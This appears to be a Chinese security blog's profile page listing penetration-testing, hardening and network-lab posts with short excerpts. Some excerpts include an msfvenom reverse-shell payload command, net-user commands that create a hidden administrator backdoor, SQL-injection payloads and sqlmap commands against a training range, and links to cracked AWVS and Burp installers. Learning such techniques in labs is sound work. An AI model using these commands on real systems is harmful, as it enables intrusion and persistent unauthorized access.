自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(43)
  • 收藏
  • 关注

原创 Linux编译源码安装nmap7.94

【代码】Linux编译源码安装nmap7.94。

2023-07-10 10:51:08 1417 3

原创 Oracle数据库

oracle数据库

2023-01-30 13:43:52 954 2

原创 内网渗透-----权限分析及防御

内网权限提升及防御

2022-10-20 10:18:37 3128 2

原创 内网渗透-----隐藏通信隧道技术

内网安全之隧道技术

2022-10-18 09:54:23 6276

原创 安全区域边界

安全区域边界要求

2022-10-17 13:58:45 1707

原创 Mysql等保2.0测评

Mysql等保2.0测评

2022-10-14 10:10:24 2613 2

原创 Redis安全加固

redis安全加固

2022-10-13 09:22:37 2333

原创 等保2.0测评:Redis 数据库配置

等保2.0测评:Redis 数据库配置

2022-10-12 11:05:40 2971

原创 mysql数据库安全加固

mysql安全加固

2022-10-11 17:05:36 4333

原创 等保2.0 Windows主机测评过程

Windows主机等保测评

2022-10-10 10:16:21 7070

原创 安全通用要求之安全通信网络

等保测评项之安全通信网络

2022-10-09 10:47:20 1932

原创 Apache服务安全加固

Apache安全加固

2022-09-30 14:10:12 1918

原创 安全通用要求之安全物理环境

等保2.0之安全物理环境

2022-09-14 13:24:27 1323

原创 阿里云服务器安装MSF

msf渗透工具安装

2022-08-31 17:07:05 1143

原创 Zabbix注入漏洞复现

CVE-2016-10134

2022-08-31 14:53:51 1517

原创 隐藏通信隧道技术

渗透中内网隧道的建立。

2022-08-30 17:10:04 5181

原创 阿里云安装docker与vulhub靶场

docker与靶场搭建

2022-08-14 17:07:23 829

原创 web中间件安全

中间件漏洞

2022-04-12 00:07:22 4689

原创 华三模拟器(防火墙)实现IPSEC穿越NAT实验

华三模拟器(防火墙)实现IPSEC穿越NAT实验实验拓扑接口及路由配置省略,FW1和FW2配置默认路由即可实现公网互通(测试两端公网互通即可开始操作)另外防火墙的策略问题我是用的 any to any,接下来直接上IPSEC的配置FW1步骤一:在FW1上创建感兴趣流,匹配两端私网地址网段[FW1] acl advanced 3002[FW1] rule 5 permit ip source 192.168.1.0 0.0.0.255 destination 172.16.1.0 0.

2021-11-30 12:45:31 9709 3

原创 华三模拟器(路由器)实现ipsec穿越NAT实验

IPSEC VPN实验拓扑接口及路由配置省略,R1和R3配置默认路由即可实现公网互通(测试两端公网互通即可开始操作)接下来主要配置IPSEC VPN,如下配置R1配置R1配置步骤一:在R1上创建感兴趣流,匹配两端私网地址网段[R1] acl advanced 3500[R1] rule 5 permit ip source 192.168.1.0 0.0.0.255 destination 172.16.1.0 0.0.0.255步骤二:在 R1 上创建IKE提议,配置验证模式为预共

2021-11-29 13:28:45 4010

原创 win10系统上安装awvs漏洞扫描器

AWVS14版本安装安装包以及激活补丁链接链接:https://pan.baidu.com/s/1fiuLM8DOWXAEncVqaNVciA 提取码:i6oo 点击安装程序一直默认即可,安装目录可自定义,安装过程中会有两个位置选择,建议选择相同路径。接下来设置你的邮箱账号密码等信息,这里自己设置不多说设置默认端口,禁止远程连接一直默认即可,出现安装界面,点击安装等待即可,出现提示安装此证书至此awvs的安装完成,接下来安装激活程序,出现如下提示说明激活成功

2021-10-31 00:52:02 2027

原创 VulnStack域环境靶场渗透(一)

红日靶场一msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.31.229 LPORT=4444 -f exe -o msf1.exe实验环境web服务器192.168.31.79192.168.52.143域成员server2003192.168.52.141域控server2008192.168.52.138物理机192.168.31.238kali-vps192.168.31.229

2021-09-20 14:27:03 1451

原创 web应用常见漏洞

web应用常见漏洞<span style="color:red;">红色</span>学习目标章节学习目标ThinkPHP 远程代码执行掌握 Think php框架 V2.x (和V5.0.20) 远程代码执行漏洞利用方式Stuts2 代码执行漏洞掌握 Stuts2 (CVE-2019-0230) 远程代码执行漏洞的利用方式Shiro

2021-09-11 12:13:33 802

原创 Windows系统密码抓取与防护

Windows系统密码抓取与防护单机密码抓取与防范LM Hash 和NTLM HashLM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eeaad3b435b51404ee 表示LM Hash为空值或被禁用NTLM Hash(MD4加密) 真正是用户密码的哈希值Windows操作系统中的密码一般由两部分组成:一部分为LM Hash,另一部分为NTLM Hash。在Windows中,Hash的结构通常如下:Username:RID:LM-Ha

2021-09-10 18:12:02 1606

原创 Windows系统隐藏用户及粘贴键后门

Windows系统隐藏用户该方法是通过建立隐藏账户,制作系统用户远程控制后门,维持目标Windows系统权限。制作方法跟步骤如下:已经获取系统权限执行添加用户操作net user hahaha$ Aa123456 /addnet localgroup administrators hahaha$ /addnet user如上图,我们已经创建成功,执行net user命令,发现是看不到hahaha$用户的:但是这就结束了吗,没有!虽然上面net user看不见该隐藏用户,但是在控制面

2021-09-06 22:52:33 689

原创 主机与数据库安全

主机与数据库安全<span style="color:red;">红色</span>学习目标章节学习目标主机共享端口及漏洞利用/检测掌握FTP服务的爆破方式掌握sambs服务的爆破方式主机远程连接端口及漏洞利用/检测掌握SSH服务的爆破方式掌握Telnet服务的爆破方式掌握RDP服务的爆破方式数据库服务端口及漏洞利用/检测了解数据库间的差异掌握MySql数据库的暴力破解掌握Postgresql数据库的暴力破解掌握mongodb数据库的暴力

2021-08-29 01:08:57 558

原创 墨者学院-----SQL注入漏洞测试(布尔盲注)

SQL注入漏洞测试(布尔盲注)第一步判断注入点:在url中输入单引号发现报错,再输入and1=1页面正常,and1=2报错说明此url存在着SQL注入漏洞http://219.153.49.228:48551/new_list.php?id=1 and 1=2第二步判断字段数利用order by 语句,值为4页面正常,5报错,说明有四个字段http://219.153.49.228:48551/new_list.php?id=1 order by 4第三步:猜解数据库的长度以及数据库名称

2021-05-21 10:45:47 588

原创 SQL手工注入漏洞测试(MySQL数据库-字符型)

字符型注入漏洞

2021-01-30 00:23:34 895 1

原创 墨者学院-----SQL过滤字符后手工注入漏洞测试(第3题)

SQL过滤字符后手工注入漏洞测试(第3题)按照正常流程,首先在url中输入单引号发现报错,接着输入–+发现页面正常此url种存在着字符型注入第一步判断字段数利用order by进行判断,发现字段数是7?id=1' order by 7 --+查找回显点?id=-1' union select 1,2,3,4,5,6, 7 --+http://219.153.49.228:45820/new_list.php?id=-1’ union select 1,2,3,4,5,6, 7 --+

2021-01-28 14:17:06 265

原创 墨者学院----SQL过滤字符后手工注入漏洞测试(第2题)

SQL过滤字符后手工注入漏洞测试(第2题)按照基本流程我们在url中输入单引号报错,说明存在SQL注入。直接输入order by发现页面异常,可能被过滤尝试利用like等于号和==/**/空格==进行绕过?id=1/**/order/**/by/**/4页面正常说明字段数为4接下来利用联合查询,看是否有回显点...

2021-01-26 15:25:43 436 1

原创 墨者学院-----SQL注入漏洞测试(宽字节)

SQL注入漏洞测试(宽字节)python2 sqlmap.py -u “http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27” --level 3 --risk 1 --thread 10python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes --dbs宽字节的注入原理...

2021-01-23 16:55:18 553

原创 墨者学院----SQL过滤字符后手工注入漏洞测试(第1题)

SQL过滤字符后手工注入漏洞测试(第1题)按照基本流程我们在url中输入单引号报错,说明存在SQL注入,但是在输入order by union select发现页面保持正常,有可能我们输入的字符被过滤过滤的"="号可以利用like代替,空格用==/**/==代替判断字段数/**/order/**/by/**/4介绍一个在线的url编码解码网站http://web.chacuo.net/charseturlencode由于被过滤所以我们要进行url的编码。%2f%2a%2a%2f%6f%7

2021-01-22 21:37:29 469

原创 墨者靶场------SQL注入漏洞测试(报错盲注)

SQL注入漏洞测试(报错盲注)自己构造请求参数,然后数据库返回错误的信息,以至于我们能够爆出我们想要的信息要进行SQL的报错注入,首先要了解MySQL的几个函数(1)concat 用来连接字符串select concat('m','y','s','q','l')  执行结果为mysql(2)updatexml第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法

2021-01-20 16:23:47 752

原创 墨者靶场----SQL注入漏洞测试(时间盲注)

SQL注入漏洞测试(时间盲注)第一种解法:利用回显点进行爆破数据库根据题目提示:墨者学院,在线靶场帮墨者找到==flag 使用?type= ==所以我们在url中输入:发现12是回显点http://219.153.49.228:49721/flag.php?type=12'利用12这个回显点进行查询数据库等信息获取数据库 pentesterlabhttp://219.153.49.228:49721/flag.php?type=database() --+获取数据库的表 comm

2021-01-20 01:35:06 736 1

原创 win10系统中安装专业版burp

win10系统安装burp破解版步骤1.安装burp所需的软件包burp的软件安装包链接:https://pan.baidu.com/s/1SF-VTuj0RbSCAR5YH6TSbQ提取码:b4y92.由于burp是运行在java环境下的一款渗透测试工具,所以必须安装在java环境下直接双击安装包即可,默认配置3.安装完成后需要配置JAVA的环境变量。(1)新建一个JAVA_HOME的系统变量,把JDK的安装路径写进系统变量(C:\Program Files\Java\jdk1.8.0_

2021-01-19 23:11:43 1681

原创 墨者靶场-X-Forwarded-For注入漏洞实战

墨者靶场-X-Forwarded-For注入漏洞实战打开靶场出现后台管理登录界面,随便输入一个用户名密码利用Burp进行拦截抓包在XFF字段的后面加上*,复制数据包到本地并保存为1.txt文档放入到Sqlmap中进行自动化探测爆破数据库sqlmap.py -r 1.txt --dbs --batch爆破表sqlmap.py -r 1.txt -D webcalendar --tables --batch爆破字段sqlmap.py -r 1.txt -D webcalendar

2021-01-19 23:10:19 289

原创 DVWA中low级别的SQL注入

DVWA中低级别的SQL注入基于错误的注入:构造特殊的SQL语句注入到数据库中,看得到的返回信息,确认注入点,如果数据库对输入的某些SQL语句无返回信息时,可以进行基于时间的注入(sleep函数)1.基于union的注入一般通过错误和布尔注入确认注入点之后,第一步猜解数据库的字段数//猜解数据库的字段数(列)' union select 1'后端代码执行如下:select first_name,last_name from dvwa.users where user_id='' uni

2020-11-23 20:24:38 785

原创 OSPF(开放最短路径优先)

OSPF路由协议1.OSPF路由协议的基本原理(1)邻居发现:运行了OSPF协议的路由器会周期性的以组播224.0.0.5的发送Hello报文来发现邻居,同时Hello报文提供维持邻居关系。每隔10s发送一次Hello报文。四个周期内未收到对端收到的Hello报文,则认为邻居失效。(2)路由交换:建立了邻居关系的路由器之间会发送自己所包含的路由表,如果自己没有对端的路由则会请求发送本身没有的...

2019-04-12 16:14:34 486

原创 STP的保护机制

BPDU保护:为了保护边缘端口,因为当一个边缘端口收到一个BPDU时,会状变为非边缘端口,会参与生成树的计算,如果频繁的UP/DOWN,就使网络一直处于生成树的计算。解决方法:在交换机的端口开启BPDU保护,当设置为BPDU保护的端口收到BPDU时,系统会将该端口变为down状态。配置:根桥保护:当网络中出现优先级更高的网桥时,根网桥可能会发生变化,导致闭塞端口发生变化,导致网络流量路径的转...

2018-11-29 17:15:51 7145 3

原创 RSTP(快速生成树协议)

相比于STP,RSTP的改进之处在以下几个方面(1)端口状态从5个变为3个。Discording,Learing,Forwarding(2)端口角色由三个变为4个。给根端口做备份的Althernate,给指定端口做备份的Backup。以及原有的根端口和指定端口。(3)BPDU的处理a:BPDU的类型变为Type2b:每台交换机都可以发送RST BPDU而不是只有根桥可以发送BPDU,好处...

2018-11-29 00:54:56 2918 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除